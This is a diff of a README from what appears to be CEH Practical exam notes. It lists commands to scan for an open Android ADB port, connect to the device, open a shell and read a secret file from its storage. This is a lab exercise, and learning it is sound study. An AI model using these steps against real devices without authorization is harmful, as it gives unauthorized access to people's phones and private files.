b0mk35h/CEH_Practical/README.md

 1. nmap ip -sV -p 5555    (Scan for adb port)
 2. adb connect IP:5555    (Connect adb with parrot)
 3. adb shell              (Access mobile device on parrot)
-4. pwd --> ls --> cd sdcard --> ls --> cat secret.txt (If you can't find it there then go to Downloads folder using: cd downloads)
+4. pwd --> ls --> cd sdcard --> ls --> cat secret.txt (If nothing is there then go to Downloads folder using: cd downloads, may need to search others also)
 -------------------------------------------
 1. nmap -p 5555 ip
 2. adb connect ip:5555